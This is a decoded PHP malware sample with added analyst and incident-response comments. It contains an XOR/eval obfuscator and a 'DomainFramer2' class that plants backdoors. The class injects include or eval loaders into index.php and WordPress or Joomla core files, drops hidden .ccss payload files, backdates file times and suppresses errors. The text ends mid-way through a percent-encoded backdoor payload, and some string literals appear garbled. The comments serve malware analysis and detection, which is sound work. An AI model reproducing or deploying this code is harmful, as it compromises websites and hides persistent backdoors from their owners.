PHP Decode
<?php srand(time()); class Obfuscator { private $_orig_script = ""; pr..
Decoded Output download
<?php
// Seeds rand() with the current Unix time. The random names, filler comments and
// padding produced further down are rand()-based, so they differ from sample to
// sample and make poor signature material.
srand(time());
class Obfuscator
{
private $_orig_script = "";
private $_stub = <<<'TTT'
function find_self($encoder)
{
$key = preg_replace($encoder("%2F%5C%28.%2A%24%2F"), '', __FILE__);
$key = trim($key);
$encoder = substr($encoder, 0);
$key = basename($key);
return $key;
}
function myxor($aaaa, $bbbb)
{
return $aaaa ^ $bbbb;
}
function myunpack()
{
return pack('H*', '$rand2_rawurldecode');
}
$encoder = myxor('$rand1_rawurldecode', myunpack());
[PAYLOAD]
$data = $encoder($data);
function find_key($encoder, $data)
{
$key = find_self($encoder);
$chunks = strlen($data)/strlen($key);
$gamma = str_repeat($key, $chunks + 1);
$ykey = substr($gamma, 0, strlen($data));
return $ykey;
}
$ykey = find_key($encoder, $data);
$data=myxor($data, $ykey);
eval($data);
TTT;
/**
 * Returns a random string made of the characters 0-9 and a-z.
 *
 * The length is drawn with rand($min, $max). The characters come from a shuffled
 * copy of the 36-character alphabet (repeated if needed); substr() starts at
 * offset 1, so the first shuffled character is always dropped.
 *
 * Analyst note: every renamed identifier and filler comment in the generated
 * loader is built from this helper, so those strings vary per sample.
 *
 * @param int $min Lower bound passed to rand().
 * @param int $max Upper bound passed to rand().
 * @return string
 */
static public function rand_str($min, $max)
{
$length = rand($min, $max);
return substr(str_shuffle(str_repeat($x = '0123456789abcdefghijklmnopqrstuvwxyz', ceil($length / strlen($x)))), 1, $length);
}
/**
 * Stores the PHP source that generate() will wrap in the XOR/eval loader.
 *
 * @param string $script Plain PHP code to be hidden.
 */
public function __construct($script)
{
$this->_orig_script = $script;
}
/**
 * Builds the obfuscated loader text from the $_stub template.
 *
 * What the output looks like (useful when triaging a suspicious file):
 *  - a run of `$<name> .= "<percent-encoded bytes>";` lines, 76 payload bytes each,
 *  - the name "rawurldecode" never appears literally; it is rebuilt at run time
 *    by XOR-ing a random 12-character string with a hex blob via pack('H*', ...),
 *  - all template variables become `$o` + 5-7 random characters and all template
 *    functions become `_` + 5-7 random characters,
 *  - the decoded payload is finally passed to eval().
 *
 * The stub re-derives the XOR key at run time from basename(__FILE__) (the
 * percent-encoded pattern in find_self decodes to /\(.*$/, which strips the
 * "(...) : eval()'d code" suffix). A sample that was renamed during collection
 * therefore has to be decoded with its original file name as key.
 *
 * @param string $key XOR key; the only caller in this file passes the dropped
 *                    file's own name.
 * @return string Loader source without the opening PHP tag.
 */
public function generate($key)
{
$stub = $this->_gen_stub();
$data = $this->_encode_payload($key);
// Split "rawurldecode" into two XOR shares so the stub can rebuild the name without containing it.
$rand1_rawurldecode = Obfuscator::rand_str(strlen("rawurldecode"), strlen("rawurldecode"));
$rand2_rawurldecode = "rawurldecode" ^ $rand1_rawurldecode;
$rand2_rawurldecode = bin2hex($rand2_rawurldecode);
$stub = str_replace("\$rand2_rawurldecode", $rand2_rawurldecode, $stub);
$stub = str_replace("\$rand1_rawurldecode", $rand1_rawurldecode, $stub);
// Emit the XOR-ed payload as a sequence of percent-encoded string appends.
$chunks = str_split($data, 76);
$data = "\$data = \"\";
";
foreach ($chunks as $chunk)
{
$data .= "\$data .= \"" . rawurlencode($chunk) . "\";
";
}
$data .= "
";
// Template identifiers and their per-sample random replacements (same order in both arrays).
// "$ekey", "myevl" and the [SPACE] placeholder do not occur in the $_stub shown in this file.
$search = array("\$key", "\$data", "\$encoder", "\$ykey", "\$ekey", "\$aaaa", "\$bbbb", "\$gamma", "find_self", "myxor", "find_key", "myevl", "myunpack");
$replace = array("\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7));
$stub = str_replace("[PAYLOAD]", $data, $stub);
$stub = str_replace("[SPACE]", str_repeat(" ", rand(0, 7)), $stub);
$stub = str_replace($search, $replace, $stub);
return $stub;
}
/**
 * Returns a copy of the $_stub template with random noise around every parenthesis.
 *
 * Each "(" and ")" may get a short block comment and/or a space placed before and
 * after it, each decided by an independent rand(0, 1). The callback is declared as a
 * named function inside this method.
 *
 * Analyst note: because of this noise, matching on the loader should ignore
 * comments and whitespace rather than rely on exact byte sequences.
 *
 * @return string Decorated stub template.
 */
private function _gen_stub()
{
$stub = $this->_stub;
function replacer35354($match)
{
$match = $match[0];
// Optional filler before the parenthesis.
if (rand(0, 1))
{
$str1 = "/*" . Obfuscator::rand_str(1, 5) . "*/";
}
else
{
$str1 = "";
}
if (rand(0, 1))
{
$str1 .= " ";
}
// Optional filler after the parenthesis.
if (rand(0, 1))
{
$str2 = "/*" . Obfuscator::rand_str(1, 5) . "*/";
}
else
{
$str2 = "";
}
if (rand(0, 1))
{
$str2 .= " ";
}
return $str1 . $match . $str2;
}
$stub = preg_replace_callback('|\(|', 'replacer35354', $stub);
$stub = preg_replace_callback('|\)|', 'replacer35354', $stub);
return $stub;
}
/**
 * XORs the stored script with $key repeated to the script's length.
 *
 * This is a plain repeating-key XOR; it hides the text from string searches but
 * is reversed by XOR-ing again with the same key.
 *
 * @param string $key Key material to repeat.
 * @return string XOR-ed bytes, same length as the stored script.
 */
private function _encode_payload($key)
{
$key = substr(str_repeat($key, (strlen($this->_orig_script) / strlen($key)) + 1), 0, strlen($this->_orig_script));
return $this->_orig_script ^ $key;
}
}
class DomainFramer2
{
private $_path_cands = array();
private $_path_cands2 = array();
private $_cscript_payload = "";
private $_current_cscript_path = "";
private $_cscripts = array();
private $_cscripts_include = array();
private $_cscripts_patched = array();
private $_last_error = "";
/**
 * Stores the payload that the patching methods will plant.
 *
 * The value is kept percent-encoded: _dump_backdoor() passes it through
 * rawurldecode(), and morph_php_str() wraps it in eval(rawurldecode(...)).
 *
 * @param string $backdoor_payload Percent-encoded PHP source.
 */
public function __construct($backdoor_payload)
{
$this->_cscript_payload = $backdoor_payload;
}
/**
 * Collects the directories that the later stages will try to modify.
 *
 * Candidates are the document root plus its sub-directories down to two levels
 * (walk_dir with depth 1, directories only). A candidate is dropped when its path
 * relative to the document root contains any substring from the exclude list.
 * The survivors are sorted from shortest to longest path.
 *
 * Incident-response note: the exclude list means typical CMS asset and library
 * directories are left alone; the document root and the remaining top-level
 * directories are where index files should be checked first.
 */
public function find_paths()
{
$docroot = DomainFramer2::get_docroot();
$this->_path_cands[] = $docroot;
$this->_path_cands = array_merge($this->_path_cands, DomainFramer2::walk_dir($docroot, 1, $skip_files = TRUE, $skip_dirs = FALSE));
$this->_path_cands = array_unique($this->_path_cands);
// Comparator: order by string length.
function csort($a, $b)
{
return strlen($a) - strlen($b);
}
// Filter callback: FALSE (drop) when the docroot-relative path contains an excluded substring.
function match_exclude_list($path)
{
$docroot = DomainFramer2::get_docroot();
$path = substr($path, strlen($docroot));
$exclude = array("font", "css", "library", "vendor", "core", "upload", "view", "controller", "style", "image", "quarantine", "tmp", "tmb", "misc", "themes", "wp-content", "wp-admin", "wp-includes", "administrator", "cache", "components", "images", "includes", "language", "libraries", "media", "modules", "plugins", "templates", "well-known");
foreach ($exclude as $exclude_item) {
if (strpos($path, $exclude_item) !== FALSE) {
return FALSE;
}
}
return TRUE;
}
$this->_path_cands = array_filter($this->_path_cands, "match_exclude_list");
usort($this->_path_cands, 'csort'); # from shortest path to longest
}
/**
 * Runs _preprocess_one() on every candidate directory and keeps those for which
 * it returned a truthy value in $_path_cands2.
 */
public function preprocess_paths()
{
foreach ($this->_path_cands as $path) {
if ($this->_preprocess_one($path)) {
$this->_path_cands2[] = $path;
}
}
}
/**
 * Runs _process_one() on every pre-processed directory and records the
 * directories where it reported success in $_cscripts.
 *
 * $_last_error is cleared before each directory, so after the loop it reflects
 * only the last directory handled.
 *
 * @param bool $force_inject Passed through to the patching methods.
 */
public function process($force_inject = FALSE)
{
foreach ($this->_path_cands2 as $path) {
$this->_last_error = "";
if ($this->_process_one($path, $force_inject)) {
$this->_cscripts[] = $path;
}
}
}
/**
 * Builds the report of modified directories as URLs.
 *
 * Each successfully processed directory is turned into "http://<HTTP_HOST>/<path
 * relative to the document root>" and filed under "include" when the directory is
 * listed in $_cscripts_include (a separate file was dropped and included), or
 * under "patch" otherwise. The host name is taken from the request's Host header.
 *
 * @return array Always contains the keys "include" and "patch", each a list of URLs.
 */
public function get_cscripts()
{
$cscripts = array();
$cscripts["include"] = array();
$cscripts["patch"] = array();
$host = $_SERVER["HTTP_HOST"];
foreach ($this->_cscripts as $current_path) {
if (in_array($current_path, $this->_cscripts_include)) {
$cscripts["include"][] = "http://" . $host . "/" . substr($current_path, strlen(DomainFramer2::get_docroot()) + 1);
} else {
$cscripts["patch"][] = "http://" . $host . "/" . substr($current_path, strlen(DomainFramer2::get_docroot()) + 1);
}
}
return $cscripts;
}
/**
 * Patches one directory: first its index.php, then any recognised CMS files.
 *
 * Both steps always run (the results are combined with a bitwise OR, not a
 * short-circuit), so a directory can end up with several modified files.
 *
 * @param string $path         Directory to process.
 * @param bool   $force_inject Passed through to the patching methods.
 * @return bool TRUE when at least one of the two steps reported success.
 */
private function _process_one($path, $force_inject = FALSE)
{
$res = $this->_patch_index($path, $force_inject);
$res |= $this->_patch_cms($path, $force_inject);
if ($res) {
return TRUE;
} else {
return FALSE;
}
}
/**
 * Creates a new index.php containing only an opening PHP tag and checks that the
 * write succeeded by reading the file back.
 *
 * Incident-response note: a directory that previously had no index file and now
 * holds a near-empty index.php is one trace of this step.
 *
 * @param string $index_php Path of the index.php to create.
 * @return bool TRUE when the file could be read back and contains "php".
 */
private function _try_create_index($index_php)
{
@file_put_contents($index_php, "<" . "?php
");
$content = @file_get_contents($index_php);
if (strpos($content, "php") !== FALSE) {
DomainFramer2::fix_rights($index_php);
$this->_last_error = "index created";
return TRUE;
} else {
return FALSE;
}
}
/**
 * Makes sure a directory is served through an index.php that can later be patched.
 *
 * Behaviour, in order:
 *  - no index.php, index.html, index.htm or .htaccess: create a stub index.php;
 *  - otherwise chmod 0755 the directory and the three index file paths;
 *  - existing index.html / index.htm are renamed to "<name>.bak.bak";
 *  - when there was no index.php, one is written that echoes the renamed file.
 *
 * Incident-response note: files named index.html.bak.bak or index.htm.bak.bak, and
 * an index.php consisting of `echo @file_get_contents('index.html.bak.bak');`
 * (or the .htm variant), are direct artefacts of this method. All file operations
 * are silenced with @, so failures leave no PHP warnings.
 *
 * @param string $path Directory to prepare.
 * @return bool Result of _try_create_index() or _fix_index_php(); FALSE when $path does not exist.
 */
private function _preprocess_one($path)
{
if (!@file_exists($path)) {
return FALSE;
}
$index_html = $path . "/" . "index.html";
$index_htm = $path . "/" . "index.htm";
$index_php = $path . "/" . "index.php";
$htaccess = $path . "/" . ".htaccess";
if (!@file_exists($index_php) && !@file_exists($index_html) && !@file_exists($index_htm) && !@file_exists($htaccess)) {
$this->_last_error = "no index";
return $this->_try_create_index($index_php);
}
DomainFramer2::fix_rights($path);
DomainFramer2::fix_rights($index_html);
DomainFramer2::fix_rights($index_htm);
DomainFramer2::fix_rights($index_php);
if (@file_exists($index_php)) {
// index.php already present: move static index files out of the way.
if (@file_exists($index_html)) @rename($index_html, $index_html . ".bak.bak");
if (@file_exists($index_htm)) @rename($index_htm, $index_htm . ".bak.bak");
} else if (@file_exists($index_html)) {
// Replace index.html with an index.php that prints the renamed original.
@rename($index_html, $index_html . ".bak.bak");
@file_put_contents($index_php, "<" . "?php
echo @file_get_contents('index.html.bak.bak');");
if (@file_exists($index_htm)) @rename($index_htm, $index_htm . ".bak.bak");
} else if (@file_exists($index_htm)) {
// Same for index.htm.
@rename($index_htm, $index_htm . ".bak.bak");
@file_put_contents($index_php, "<" . "?php
echo @file_get_contents('index.htm.bak.bak');");
} else {
// Only .htaccess existed: create a stub index.php.
@file_put_contents($index_php, "<" . "?php
");
}
return $this->_fix_index_php($index_php);
}
/**
 * Ensures the given file contains an opening PHP tag.
 *
 * When the file exists but has no "<?php" (case-insensitive), an empty PHP block is
 * prepended and the original content is kept after it. The result of the write is
 * not checked.
 *
 * @param string $path File to check.
 * @return bool TRUE when the file exists, FALSE otherwise.
 */
private function _fix_index_php($path)
{
if (@file_exists($path)) {
$index_php_content = @file_get_contents($path);
if (stripos($index_php_content, "<" . "?php") !== FALSE) {
return TRUE;
} else {
$index_php_content = "<" . "?php
?" . ">
" . $index_php_content;
@file_put_contents($path, $index_php_content);
return TRUE;
}
}
return FALSE;
}
/**
 * Writes the obfuscated payload to a hidden file and returns its path.
 *
 * The path is cached in $_current_cscript_path, so only one file is written per
 * run. The target is a writable sub-directory of $root_dir (walk_dir with depth 2,
 * i.e. up to three levels down), taken from a shuffled list. The file name is a
 * dot, the first eight hex characters of md5(time()), and the extension ".ccss".
 * The file name is also used as the XOR key for the obfuscator.
 *
 * Incident-response note: look for hidden files matching `.[0-9a-f]{8}.ccss`
 * that begin with a PHP opening tag. fix_time() backdates the modification time
 * by a random 30 to 365 days, so mtime-based "recently changed" searches will miss
 * the file; compare against a known-good file listing or hashes instead.
 *
 * @param string $root_dir Directory under which a writable location is searched.
 * @return string|null Path of the written file, or NULL when nothing could be written.
 */
private function _dump_backdoor($root_dir)
{
if ($this->_current_cscript_path) {
return $this->_current_cscript_path;
}
$dirs = DomainFramer2::walk_dir($root_dir, $depth = 2, $skip_files = TRUE, $skip_dirs = FALSE);
$root_dir = "";
shuffle($dirs);
// No break: the last writable directory in the shuffled order is the one kept.
foreach ($dirs as $dir) {
if (@is_writable($dir)) {
$root_dir = $dir;
}
}
if (empty($root_dir))
{
$this->_current_cscript_path = "";
$this->_last_error = "no writable for payload";
return NULL;
}
DomainFramer2::fix_rights($root_dir);
$obfuscator = new Obfuscator(rawurldecode($this->_cscript_payload));
$name = "." . substr(md5(time()), 0, 8) . ".ccss";
$this->_current_cscript_path = $root_dir . "/" . $name;
$cscript_file_content = "<" . "?php" . "
" . $obfuscator->generate($name) . "
";
@file_put_contents($this->_current_cscript_path, $cscript_file_content);
DomainFramer2::fix_time($this->_current_cscript_path);
if (!@is_file($this->_current_cscript_path)) {
$this->_current_cscript_path = "";
$this->_last_error = "cant dump payload";
return NULL;
}
return $this->_current_cscript_path;
}
/**
 * Injects a loader into one PHP file via insert_in_head().
 *
 * Two variants exist:
 *  - a hidden payload file could be written: the injected code assigns its path to
 *    a variable named `$r` + 1-5 random characters, copies it with str_repeat(.., 1)
 *    into `$t` + 1-5 random characters, and calls `@include_once` on that variable
 *    with a short block comment between keyword and parenthesis. In the path, "-"
 *    and one character picked from "hmepulic" are written as \x hex escapes;
 *  - no writable directory: the whole payload is inlined through morph_php_str().
 *
 * Incident-response note: near the first PHP opening tag of a patched file, look
 * for an `@include_once` of a variable whose string value contains \x escapes and
 * ends in ".ccss", or for the inline form described at morph_php_str().
 *
 * @param string $path          File to modify.
 * @param string $root          Directory the file belongs to; recorded as include/patched.
 * @param bool   $force_inject  Passed to insert_in_head().
 * @param bool   $recovery_mode Passed to insert_in_head().
 * @return bool Result of insert_in_head(); FALSE when $path does not exist.
 */
private function _patch_file($path, $root, $force_inject = FALSE, $recovery_mode = FALSE)
{
if (!@file_exists($path)) {
return FALSE;
}
$backdoor_path = $this->_dump_backdoor($root);
if (!empty($backdoor_path)) {
//$backdoor_path = $backdoor_path
$dict = str_split("hmepulic");
$sym = $dict[array_rand($dict)];
$backdoor_path = str_replace("-", "\x" . dechex(ord("-")), $backdoor_path);
$backdoor_path = str_replace($sym, "\x" . dechex(ord($sym)), $backdoor_path);
$patch = "
\$path = \"" . $backdoor_path . "\"; ";
$patch .= "\$apath = str_repeat(\$path, 1); ";
$patch .= sprintf("@include_once /* %s */ (\$apath);
", Obfuscator::rand_str(1, 5));
$patch = str_replace("\$path", "\$r" . Obfuscator::rand_str(1, 5), $patch);
$patch = str_replace("\$apath", "\$t" . Obfuscator::rand_str(1, 5), $patch);
$this->_cscripts_include[] = $root;
} else // cant dump backdoor, probable no writable dirs
{
// try patch full backdoor content
$patch = DomainFramer2::morph_php_str($this->_cscript_payload);
$this->_cscripts_patched[] = $root;
}
$res = DomainFramer2::insert_in_head($path, $patch, $force_inject, $recovery_mode);
if ($res === FALSE)
{
$this->_last_error = "unwritable for patch";
}
return $res;
}
/**
 * Patches the index.php of the given directory.
 *
 * @param string $path         Directory whose index.php is modified.
 * @param bool   $force_inject Passed through to _patch_file().
 * @return bool Result of _patch_file().
 */
private function _patch_index($path, $force_inject = FALSE)
{
$index_php = $path . "/" . "index.php";
return $this->_patch_file($index_php, $path, $force_inject);
}
/**
 * Patches additional core files when the directory looks like a known CMS.
 *
 * The CMS is guessed from the content of index.php: "wp-blog-header.php" selects
 * the WordPress list, "_JEXEC" selects the Joomla list. Each listed file is
 * chmod-ed to 0755 and, if writable, handed to _patch_file(). The running $status
 * is passed as $recovery_mode, so once one file has been patched the remaining
 * ones are only rewritten if they already carry a marker.
 *
 * Incident-response note: on an affected site, integrity-check exactly these
 * files against the vendor release: wp-settings.php, wp-config.php,
 * wp-includes/load.php, wp-content/plugins/akismet/akismet.php (WordPress) and
 * libraries/import.php, includes/framework.php (Joomla).
 *
 * @param string $path         Directory containing the CMS.
 * @param bool   $force_inject Passed through to _patch_file().
 * @return bool|int FALSE when no CMS was recognised, otherwise the OR of the patch results.
 */
private function _patch_cms($path, $force_inject = FALSE)
{
$index_php = $path . "/" . "index.php";
$index_php_content = @file_get_contents($index_php);
if (strpos($index_php_content, "wp-blog-header.php") > 0) {
$inject_file_cands = array($path . "/" . "wp-settings.php", $path . "/" . "wp-config.php", $path . "/" . "wp-includes/load.php", $path . "/" . "wp-content/plugins/akismet/akismet.php");
} elseif (strpos($index_php_content, "_JEXEC") > 0) {
$inject_file_cands = array($path . "/" . "libraries/import.php", $path . "/" . "includes/framework.php",);
} else {
$inject_file_cands = array();
}
if (!count($inject_file_cands)) {
return FALSE;
}
shuffle($inject_file_cands);
$status = FALSE;
$inject_file_cand = "";
for ($i = 0; $i < count($inject_file_cands); $i++) {
$inject_file_cand = $inject_file_cands[$i];
DomainFramer2::fix_rights($inject_file_cand);
if (@is_writable($inject_file_cand)) {
$status |= $this->_patch_file($inject_file_cand, $path, $force_inject, $status);
}
}
if (empty($inject_file_cand))
{
return FALSE;
}
return $status;
}
/**
 * Recursively lists entries below $dir, limited by $depth.
 *
 * $depth 0 lists only the direct children of $dir; each extra unit descends one
 * more level. Errors from opendir()/readdir() are silenced, and an unreadable
 * directory simply yields an empty list.
 *
 * @param string $dir        Directory to list.
 * @param int    $depth      Remaining recursion depth; negative returns an empty array.
 * @param bool   $skip_files When TRUE, files are left out of the result.
 * @param bool   $skip_dirs  When TRUE, directories are left out of the result (they are still descended into).
 * @return array List of paths in the form "$dir/$entry".
 */
static public function walk_dir($dir, $depth = 0, $skip_files = FALSE, $skip_dirs = TRUE)
{
if ($depth < 0) {
return array();
}
$result = array();
if (($h = @opendir($dir)) === FALSE) {
return $result;
}
while (($f = @readdir($h)) !== FALSE) {
if ($f == '.' || $f == '..') {
continue;
}
$current_file = "$dir/$f";
if (@is_dir($current_file)) {
if (!$skip_dirs) {
$result[] = $current_file;
}
$result = array_merge($result, DomainFramer2::walk_dir($current_file, $depth - 1, $skip_files, $skip_dirs));
} else {
if (!$skip_files) {
$result[] = $current_file;
}
}
}
@closedir($h);
return $result;
}
/**
 * Sets the mode of $path to 0755, ignoring any failure.
 *
 * Incident-response note: this is applied to directories and files before they are
 * written, so unexpected 0755 modes on index or CMS core files can accompany the
 * other artefacts of this script.
 *
 * @param string $path File or directory to chmod.
 */
static public function fix_rights($path)
{
@chmod($path, 0755);
}
/**
 * Overwrites the timestamps of $path with touch().
 *
 * With the default $tm of -1 the time is set to a random point between 30 and 365
 * days in the past; otherwise the given timestamp is used.
 *
 * Incident-response note: modification times of touched files are attacker-chosen
 * and must not be used to date the compromise. Prefer the inode change time,
 * which touch() cannot set to an arbitrary value, or a file-integrity baseline.
 *
 * @param string $path File to touch.
 * @param int    $tm   Unix timestamp to set, or -1 for a random past time.
 */
static public function fix_time($path, $tm=-1)
{
if ($tm == -1)
{
@touch($path, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));
}
else
{
@touch($path, $tm);
}
}
/**
 * Works out the web document root from the current request.
 *
 * The query string is cut from REQUEST_URI, and the remaining URI path is searched
 * (last occurrence) in SCRIPT_FILENAME; everything before the match is taken as
 * the document root. When the URI path is not found, DOCUMENT_ROOT is used; when
 * it matches at offset 0, "/" is returned.
 *
 * NOTE(review): the search string on the return line is shown as "\" in this
 * decoded listing, which is not a complete PHP string literal. Presumably the
 * decoder collapsed an escaped backslash (backslash-to-slash normalisation);
 * confirm against the raw sample.
 *
 * @return string Document root path.
 */
static public function get_docroot()
{
$request_uri = "";
$docroot = "";
if (strpos($_SERVER['REQUEST_URI'], "?") !== FALSE) {
$request_uri = explode("?", $_SERVER['REQUEST_URI']);
$request_uri = $request_uri[0];
} else {
$request_uri = $_SERVER['REQUEST_URI'];
}
$docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $request_uri);
if ($docroot_end === FALSE) {
$docroot = $_SERVER['DOCUMENT_ROOT'];
} elseif ($docroot_end === 0) {
return "/";
} else {
$docroot = substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end);
}
return str_replace("\", "/", $docroot);
}
/**
 * Rewrites part of a string as three-digit octal escape sequences.
 *
 * A step between 2 and 5 is chosen at random; every character whose index is a
 * multiple of that step is replaced by a backslash followed by its octal code,
 * unless the character is one of the two characters excluded in the condition.
 * Inside a double-quoted PHP string the result evaluates to the original text.
 *
 * NOTE(review): the two excluded characters are shown as "\" and "\"" in this
 * decoded listing; presumably they are the backslash and the double quote, with
 * the escaping lost by the decoder. Confirm against the raw sample.
 *
 * Analyst note: the random step means the same payload has several on-disk forms;
 * un-escape octal sequences before comparing samples.
 *
 * @param string $string Text to rewrite.
 * @return string Text with some characters replaced by octal escapes.
 */
static public function morph_str($string)
{
$hex = '';
$module = rand(2, 5);
for ($i = 0; $i < strlen($string); $i++) {
if (($i % $module) == 0 && $string[$i] != "\" && $string[$i] != "\"") {
$code = decoct(ord($string[$i]));
$hex .= "\\" . (strlen($code) == 3 ? $code : "0" . $code);
} else {
$hex .= $string[$i];
}
}
return $hex;
}
/**
 * Returns a string of $len space characters.
 *
 * @param int $len Number of spaces.
 * @return string
 */
static public function gen_space_string($len)
{
$str = "";
for ($i = 0; $i < $len; $i++) {
$str .= " ";
}
return $str;
}
/**
 * Builds the inline form of the payload, used when no separate file can be written.
 *
 * The generated code is one line that starts with 256 spaces and assigns a
 * partly octal-escaped `eval(rawurldecode("..."));` string to $user_auth_cookie,
 * followed by `eval($user_auth_cookie);`.
 *
 * Incident-response note: the 256 leading spaces push the assignment out of view
 * in editors without line wrapping. Searching PHP files for the variable name
 * `$user_auth_cookie` followed by an eval() of that variable, or for very long
 * runs of leading spaces, finds this form.
 *
 * @param string $string Percent-encoded payload.
 * @return string PHP statements to inject.
 */
static public function morph_php_str($string)
{
$assert_parameter_name = "\$user_auth_cookie";
$assert_payload = DomainFramer2::morph_str('eval(rawurldecode(\"' . $string . '\"));');
$initial_line = DomainFramer2::gen_space_string(256) . $assert_parameter_name . ' = "' . $assert_payload . '";' . "
";
return $initial_line . "eval(" . $assert_parameter_name . ");";
}
/**
 * Inserts $php_code at the top of a PHP file, wrapped in a per-file marker.
 *
 * The marker is a block comment holding five hex characters, substr(md5($path), 5, 5),
 * and is written before and after the injected code. Processing order:
 *  - chmod the file to 0755 and give up if it is still not writable;
 *  - skip files containing "schemas/sitemap/0.9";
 *  - a file with exactly one marker has that lone marker removed;
 *  - in recovery mode, files without a marker are left alone;
 *  - with $force_inject, an existing marker-to-marker block is removed first;
 *  - the code goes right after the first PHP opening tag, or in a new PHP block
 *    at the very start when an html tag comes first or no PHP tag exists;
 *  - the modification time is set to two minutes in the future;
 *  - success is decided by re-reading the file and finding the marker.
 *
 * Incident-response note: because the marker depends only on the absolute path,
 * it can be recomputed for every PHP file on a host and searched for, which
 * identifies patched files independently of the randomised loader text. A
 * modification time slightly ahead of the time of write is another trace.
 *
 * @param string $path          File to modify.
 * @param string $php_code      PHP statements to insert.
 * @param bool   $force_inject  Replace an existing marked block.
 * @param bool   $recovery_mode Only touch files that already contain the marker.
 * @return bool TRUE when the marker is present in the file after writing.
 */
static public function insert_in_head($path, $php_code, $force_inject = FALSE, $recovery_mode = FALSE)
{
DomainFramer2::fix_rights($path);
if (!@is_writable($path))
{
return FALSE;
}
$already_patched_marker = "/*" . substr(md5($path), 5, 5) . "*/";
$php_code = "
" . $already_patched_marker . "
" . $php_code . "
" . $already_patched_marker;
$content = @file_get_contents($path);
if (strpos($content, "schemas/sitemap/0.9") !== FALSE) {
return FALSE;
}
if (substr_count($content, $already_patched_marker) === 1) {
$content = str_replace($already_patched_marker, "", $content);
}
if ($recovery_mode && strpos($content, $already_patched_marker) === FALSE)
{
return FALSE;
}
if (strpos($content, $already_patched_marker) !== FALSE && $force_inject) {
$from = "/" . preg_quote($already_patched_marker, "/") . "[.\s\S]*" . preg_quote($already_patched_marker, "/") . "/";
$content = preg_replace($from, "", $content, 1);
}
$html_pos = stripos($content, "<" . "html");
$php_pos = stripos($content, "<" . "?php");
if ($html_pos === FALSE) {
$html_pos = strlen($content) + 1;
}
if ($php_pos === FALSE) {
$php_pos = strlen($content) + 1;
}
if ($php_pos < $html_pos) {
$from = "/" . preg_quote("<" . "?" . "php", "/") . "/";
$content = preg_replace($from, "<" . "?" . "php" . $php_code, $content, 1);
} else {
$content = "<" . "?php " . $php_code . "
?" . ">
" . $content;
}
@file_put_contents($path, $content);
DomainFramer2::fix_time($path, time() + 120);
$content = @file_get_contents($path);
if (strpos($content, $already_patched_marker) !== FALSE) {
return TRUE;
} else {
return FALSE;
}
}
/**
 * Returns the last status text recorded by the patching methods
 * (for example "no index", "index created" or "unwritable for patch").
 *
 * @return string
 */
public function last_error()
{
return $this->_last_error;
}
}
$framer = new DomainFramer2("if%20%28%21defined%28%27stream_context_create%20%27%29%29%0A%7B%0Adefine%28%27stream_context_create%20%27%2C%201%29%3B%0A%40ini_set%28%27error_log%27%2C%20NULL%29%3B%40ini_set%28%27log_errors%27%2C%200%29%3B%40ini_set%28%27max_execution_time%27%2C%200%29%3B%40error_reporting%280%29%3B%40set_time_limit%280%29%3Bif%28%21defined%28%22PHP_EOL%22%29%29%7Bdefine%28%22PHP_EOL%22%2C%20%22%5Cn%22%29%3B%7Dif%20%28%21defined%28%27file_put_contents%20%27%29%29%7Bdefine%28%27file_put_contents%20%27%2C%201%29%3B%24ukwfik%20%3D%20%27acd14c4d-9a35-4b6f-b40f-ad76c9c8040f%27%3Bglobal%20%24ukwfik%3Bfunction%20xzpkqd%28%24vfpapv%29%20%7Bif%20%28strlen%28%24vfpapv%29%20%3C%204%29%7Breturn%20%22%22%3B%7D%24auleptmm%20%3D%20%22ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%2B/%3D%22%3B%24smgnwvjz%20%3D%20str_split%28%24auleptmm%29%3B%24smgnwvjz%20%3D%20array_flip%28%24smgnwvjz%29%3B%24ukonchp%20%3D%200%3B%24vvwyxfyx%20%3D%20%22%22%3B%24vfpapv%20%3D%20preg_replace%28%22%7E%5B%5EA-Za-z0-9%5C%2B%5C/%5C%3D%5D%7E%22%2C%20%22%22%2C%20%24vfpapv%29%3Bdo%20%7B%24hcybkhvd%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24wpeeeyt%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24gkzbzq%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24stjwqzxf%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24kgiqbylxuwgmizz%20%3D%20%28%24hcybkhvd%20%3C%3C%202%29%20%7C%20%28%24wpeeeyt%20%3E%3E%204%29%3B%24zqtjtw%20%3D%20%28%28%24wpeeeyt%20%26%2015%29%20%3C%3C%204%29%20%7C%20%28%24gkzbzq%20%3E%3E%202%29%3B%24rxspesu%20%3D%20%28%28%24gkzbzq%20%26%203%29%20%3C%3C%206%29%20%7C%20%24stjwqzxf%3B%24vvwyxfyx%20%3D%20%24vvwyxfyx%20.%20chr%28%24kgiqbylxuwgmizz%29%3Bif%20%28%24gkzbzq%20%21%3D%2064%29%20%7B%24vvwyxfyx%20%3D%20%24vvwyxfyx%20.%20chr%28%24zqtjtw%29%3B%7Dif%20%28%24stjwqzxf%20%21%3D%2064%29%20%7B%24vvwyxfyx%20%3D%20%24vvwyxfyx%20.%20chr%28%24rxspesu%29%3B%7D%7D%20while%20%28%24ukonchp%20%3C%20strlen%28%24vfpapv%29%29%3Bretu
